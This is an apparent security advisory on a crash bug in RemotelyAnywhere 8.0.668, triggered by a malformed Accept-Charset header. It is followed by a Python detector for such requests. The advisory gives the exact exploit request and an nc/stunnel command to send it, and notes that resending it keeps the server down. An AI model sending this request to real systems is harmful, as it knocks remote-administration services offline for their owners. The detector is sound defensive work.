Remotely Anywhere is "a well known remote administration software". A vulnerability in Remotely Anywhere allows remote attackers to crash the product by sending it a malformed HTTP request.

Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/remotelynowhere-adv.txt
Vulnerable Systems:
* Remotely Anywhere Server and Workstation version 8.0.668
The RemotelyAnywhere.exe process (port 2000) can be easily crashed through an HTTP request with an invalid Accept-Charset parameter, which leads to a NULL pointer dereference.
The management service restarts the process automatically in less than one minute, so an attacker needs to resend the malformed request at regular intervals to keep the server down for as long as he desires.
Exploit:
Send:
GET / HTTP/1.1
Accept-Charset: boom
Using the following command line:
stunnel http_to_https.conf
nc 127.0.0.1 80 -v -v < remotelynowhere.txt
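
A defensive check for the request shown above, as an added example that is not part of the original advisory: it pulls Accept-Charset out of raw request heads and flags list members that are malformed or name no known charset. The function names and sample requests are constructed, and Python's codec registry is an assumed stand-in for whatever charset allowlist a fronting filter would use.

```python
import codecs
import re

# Charset names are RFC 9110 "token"s; weights are q-values between 0 and 1.
TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
QVALUE = re.compile(r"^(0(\.\d{0,3})?|1(\.0{0,3})?)$")

# Constructed samples: the advisory's request and a well-formed one.
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\nAccept-Charset: boom\r\n\r\n",
    b"GET / HTTP/1.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n\r\n",
]

def accept_charset_values(raw_request):
    """Return every Accept-Charset header value in a raw request head."""
    head = raw_request.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0]
    values = []
    for line in head.split(b"\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"accept-charset":
            values.append(value.decode("latin-1").strip())
    return values

def is_known_charset(name):
    """Assumption: Python's codec registry stands in for a charset allowlist."""
    try:
        return bool(TOKEN.match(name)) and codecs.lookup(name) is not None
    except LookupError:
        return False

def suspicious_charsets(header_value):
    """Return list members that are malformed or name no known charset."""
    bad = []
    for member in filter(None, (m.strip() for m in header_value.split(","))):
        name, _, param = (part.strip() for part in member.partition(";"))
        key, _, weight = (part.strip() for part in param.partition("="))
        if param and (key.lower() != "q" or not QVALUE.match(weight)):
            bad.append(member)  # parameter is not a valid q-value
        elif name != "*" and not is_known_charset(name):
            bad.append(member)  # e.g. "boom"
    return bad

def flag_requests(raw_requests):
    """Return (index, offending members) for each request worth alerting on."""
    hits = []
    for i, raw in enumerate(raw_requests):
        bad = [m for v in accept_charset_values(raw) for m in suspicious_charsets(v)]
        if bad:
            hits.append((i, bad))
    return hits
```

Since the process restarts within a minute and the request has to be repeated to keep it down, hits from one source recurring at sub-minute intervals are the pattern to alert on.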